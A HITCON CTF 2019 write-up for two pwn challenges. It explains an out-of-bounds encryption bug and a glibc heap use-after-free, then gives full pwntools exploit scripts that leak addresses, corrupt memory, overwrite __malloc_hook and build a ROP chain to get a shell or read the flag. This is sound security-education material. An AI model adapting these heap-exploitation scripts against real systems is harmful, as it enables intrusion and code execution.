HITCON CTF 2019 Pwn Write-up
Crypto in the Shell
The vulnerability is easy: the encryption causes out-of-bound access. We can encrypt a piece of memory with arbitrary offset and the result of encryption is printed. Here are steps to exploit:
- Encrypt the key, and the result of encryption will be shown, which is the new key
- Encrypt the offset
-0x3a0
, decrypt the result to leak the program address - Similarly, encrypt the offset
-0x40
to leaklibc
address, since it storesstderr
. Note that we can not usestdout
orstdin
to leaklibc
address, since they are being used by the program and changing their contents will cause crash - Use
libc_addr+0x3f04c0
to leak stack address, then we can rewrite loop variablei
to bypass number of encryption limitation. However, due to existence of ASLR, we only have1/2
probability to makei
negative - Brute-force byte-by-byte to rewrite
ld_addr+0x228968
to"sh"
andld_addr+0x228f60
to&system
. Due to remote timeout, we need to pre-calculate number of encryptions needed to obtain a certain byte and send payloads altogether exit
to get the shell
from pwn import *
from random import *
from time import time
from hashlib import *
from Crypto.Cipher import AES
from binascii import *
AES_BLOCK_SIZE = 16
g_local=1
context(log_level='debug', arch='amd64')
e = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")
if g_local:
sh = process("./chall")
gdb.attach(sh)
else:
sh = remote("3.113.219.89", 31337)
def enc(off, size=0xf):
off &= 0xffffffffffffffff
size &= 0xffffffffffffffff
sh.sendline(str(off))
sh.sendlineafter("size:", str(size))
ret = sh.recvuntil("offset:")[:-len("offset:")]
assert len(ret) % 0x10 == 0
return ret
key = enc(-0x20)
iv = 0x10 * '\x00'
def dec(data):
return AES.new(key, AES.MODE_CBC, iv).decrypt(data)
def enc2(data):
return AES.new(key, AES.MODE_CBC, iv).encrypt(data)
prog_addr = dec(enc(-0x3a0))
prog_addr = u64(prog_addr[8:]) - 0x202008
print hex(prog_addr)
libc_addr = dec(enc(-0x40))
libc_addr = u64(libc_addr[:8]) - e.symbols["_IO_2_1_stderr_"]
print hex(libc_addr)
def calc_off(addr):
return addr - (prog_addr + 0x2023a0)
env_off = calc_off(libc_addr+0x3f04c0)
stack_addr = dec(enc(env_off))
stack_addr = u64(stack_addr[:8]) + 0x10 - 0x120
print hex(stack_addr)
# 0.5, need to make i negative
enc(calc_off(stack_addr))
# previous bytes might be affected
def write_byte(addr, val, data):
assert len(data) == 0x10
off = calc_off(addr - 0xf)
count = 0
while True:
data = enc2(data)
count += 1
if u8(data[0xf]) == val:
break
for i in xrange(count):
sh.send(str(off) + '\n15\n')
for i in xrange(count):
sh.recvuntil("offset:")
return data
ld_addr = libc_addr + 0x3f1000
def write_bytes(addr, s, data):
assert len(data) == 0x10 + len(s)
i = len(s) - 1
for c in s[::-1]:
data = data[:1+i] + write_byte(\
addr + i, u8(c), data[1+i:0x11+i]) + \
data[0x11+i:]
i -= 1
# print hex(u64(dec(enc(calc_off(ld_addr + 0x228f50)))[:8]))
# sh.interactive()
od1 = p64(0) + p64(1)
write_bytes(ld_addr + 0x228968, "sh", od1 + 2*'\x00')
od2 = p64(0) + p64(0)
write_bytes(ld_addr + 0x228f60, \
p64(libc_addr + e.symbols["system"])[:3], \
od2+p64(ld_addr+0x10e0)[:3])
# local 0x440->0x441
# remote 0x440->0x496
# print hex(libc_addr + e.symbols["system"])
# print hex(u64(dec(enc(calc_off(ld_addr + 0x228f60)))[:8]))
# print hex(u64(dec(enc(calc_off(ld_addr + 0x228968)))[:8]))
sh.interactive()
One Punch Man
The vulnerability is a simple UAF, the relevant leakage is very easy, but we can only use calloc
in normal allocation which does not use tcache
, and size does not allow usage of fastbin
and unsorted bin
that would not be inserted into tcache
. The hidden function allows malloc(0x217)
, but only when 0x220
tcache
count is larger than 6, so we cannot write fd
to achieve arbitrary write.
Initially we tried unsorted bin attack
, but it seems that we must use chunk that will not be putted into tcache
to do unsorted bin attack. Then I tried house of lore
to allocate a chunk at tcache arena
, however the program crashes at memset
function since the size passed into memset
function is too large. The root cause is that calloc
uses the chunk_size-0x10
as the argument of memset
, and chunk_size
can only be 0
or a heap address, which always gives a size that is way too large.
The solution to that is to use unlink
first to rewrite 0x220 tcache pointer
to &pointer - 0x18
, so that we can allocate a chunk at tcache arena
to fake a 0x10
chunk size there first, then use house of lore
attack again, and this time size passed into memset
is 0x10-0x10=0
which does not cause any crash.
Then it is easy to rewrite the 0x220 tcache pointer
while still keeping tcache count
being 7, by allocating malloc(0x217)
we can achieve arbitrary memory write. We can write __malloc_hook
and perform ROP since stack contents are controllable.
from pwn import *
AES_BLOCK_SIZE = 16
g_local=0
context(log_level='debug', arch='amd64')
e = ELF("./libc.so.6")
if g_local:
sh = process("./one_punch", env={"LD_LIBRARY_PATH":"."})
gdb.attach(sh)
else:
sh = remote("52.198.120.1", 48763)
def ce(cmd, idx, name):
sh.send(cmd + '\x00')
sh.sendafter("idx: ", str(idx) + '\x00')
sh.sendafter("name: ", name)
sh.recvuntil("> ")
create = lambda idx,name: ce('1', idx, name)
edit = lambda idx,name: ce('2', idx, name)
def show(idx):
sh.send('3\x00')
sh.sendafter("idx: ", str(idx) + '\x00')
sh.recvuntil("name: ")
ret = sh.recvuntil("\n####")[:-5]
sh.recvuntil("> ")
return ret
def delete(idx):
sh.send('4\x00')
sh.sendafter("idx: ", str(idx) + '\x00')
return sh.recvuntil("> ")
def punch(data="a"):
sh.send("50056".ljust(8, '\x00'))
sh.send(data)
sh.recvuntil("> ")
create(0, '0' * 0x217)
create(1, '1' * 0x217)
delete(0)
delete(1)
heap_addr = u64(show(1) + '\x00\x00') - 0x260
for i in xrange(5):
create(0, '2' * 0x217)
delete(0)
create(0, '2' * 0x217)
create(1, '3' * 0x217)
delete(0)
libc_addr = u64(show(0)+'\x00\x00') - 0x1e4ca0
print hex(heap_addr),hex(libc_addr)
delete(1)
punch() # consume 1 tcache
create(0, 'T' * 0x217)
delete(0)
edit(0, p64(0)*2)
delete(0)
# now top chunk + 0x10 == top elem in 0x220
for i in xrange(3):
create(i, 'U' * 0x217)
for i in xrange(3):
delete(i) # all merged to top
fake_chunk = p64(0) + p64(0x211)
fake_chunk += p64(heap_addr + 0x150 - 0x18)
fake_chunk += p64(heap_addr + 0x150 - 0x10)
fake_chunk = fake_chunk.ljust(0x210, 'F')
fake_chunk += p64(0x210) + p64(0x600)
create(0, cyclic(0x400))
edit(0, fake_chunk)
# 0x220 <- 0x200 top
# +0x1e0 <- g[2].ptr
create(2, cyclic(0x400))
# current heap layout:
# 0x400 chunk
# [fake 0x210 chunk + 0x600 chunk head, whose next is top]
# 0x400 chunk
delete(1) # unlink trigger, things merged to top
punch(p64(0x28))
# fake chunk_size for smallbin attack
# otherwise calloc will crash in memset
create(0, '7' * 0x217)
delete(0) # fill 0x220 tcache
# consolidate topchunk
for i in xrange(6):
create(0, '4' * 0x1f0)
delete(0)
create(1, 'P' * 0x217) # create a padding
create(0, '4' * 0x1f0) # last tcache chunk
delete(0) # put it to tcache
edit(0, p64(0) + p64(0))
# rewrite fd and key to bypass double free check
delete(0) # to topchunk
delete(1) # to topchunk
# now 0x200 -> 7, top element is behind topchunk
# now 0x220 -> 7
create(0, '5' * 0x220)
create(0, '4' * 0x1f0) # chunk_head == top at 0x200
create(1, '5' * 0x200)
delete(0)
create(1, '5' * 0x200) # put to smallbin
edit(0, p64(libc_addr+0x1e4e90) + p64(heap_addr+0x130))
delete(1)
edit(1, p64(0)*2 + p64(heap_addr+0x130))
create(0, 'C' * 0x1f0)
create(0, 'A' * 0x10 + p64(libc_addr + \
e.symbols["__malloc_hook"]).ljust(0x1e0, '\x00'))
# add rsp,48; ret
punch(p64(libc_addr + 0x8cfd6) + "flag\x00")
pop_rdi = p64(libc_addr + 0x26542)
pop_rsi = p64(libc_addr + 0x26f9e)
pop_rdx = p64(libc_addr + 0x12bda6)
pop_rcx = p64(libc_addr + 0x10b31e)
rop = pop_rdi + p64(2)
rop += pop_rsi
rop += p64(libc_addr + e.symbols["__malloc_hook"] + 8)
rop += pop_rdx + p64(0)
rop += p64(libc_addr + e.symbols["syscall"])
rop += pop_rdi + p64(3)
rop += pop_rsi + p64(heap_addr + 0x2000)
rop += pop_rdx + p64(0x100)
rop += p64(libc_addr + e.symbols["read"])
rop += pop_rdi + p64(1)
rop += pop_rsi + p64(heap_addr + 0x2000)
rop += pop_rdx + p64(0x100)
rop += p64(libc_addr + e.symbols["write"])
rop += p64(0)
create(0, rop)
sh.interactive()